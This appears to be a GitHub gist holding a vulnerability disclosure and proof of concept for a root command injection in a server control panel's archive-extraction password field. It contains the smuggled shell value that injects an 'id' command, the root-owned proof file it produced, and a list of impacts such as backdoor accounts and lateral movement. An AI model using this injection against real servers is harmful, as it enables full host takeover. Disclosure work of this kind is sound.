Skip to content
Ba0b8aa9f7516ea0e57b173146ce5408

Ba0b8aa9f7516ea0e57b173146ce5408

gist.github.com • September 28, 2026

Save zuesdevil/ba0b8aa9f7516ea0e57b173146ce5408 to your computer and use it in GitHub Desktop.

Proof of Concept and Steps to Reproduce

Target:

Panel process: PID 10001 /www/server/panel/pyenv/bin/python3 /www/server/panel/BT-Panel (root)

2.STEP 0: Upload the ZIP file

3.Password Command Injection Injection Request:

Actual value passed to password (repr): “‘ ;id > /tmp/bt_pwned_h05; echo ’” Shell command generated on the host ( panelTask.py:583 ):

Double-Check Proof Files

Read using the panel's GetFileBody API

Host: Read directly using sudo

Password injection: The panel responds with {“status”: true, ‘msg’: “File extracted successfully!”} . The marker file /tmp/bt_pwned_h05 has been created with the injected id : Owner root , uid=0 gid=0 , size 36, mtime 2026-06-30 23:09:12.462 ; Content uid=0(root) gid=0(root) group=0(root) ; SHA256: a34997283ff1db054f91c9abd2ffc1e2a1e402dd21b2cee052bed790566cce5a .

Owner root , uid=0 gid=0 , size 36, mtime 2026-06-30 23:09:12.462 ;

Content uid=0(root) gid=0(root) group=0(root) ;

SHA256: a34997283ff1db054f91c9abd2ffc1e2a1e402dd21b2cee052bed790566cce5a .

This proves that the password parameter of _unzip is vulnerable to command injection , executed as root, and the API returns a success response.

RCE, Persistence, Backdoor Accounts, Lateral Movement, Complete Compromise of the Host

Self-contained PoC script

Original correspondence with the vendor's maintainer via email(this is eml File Format)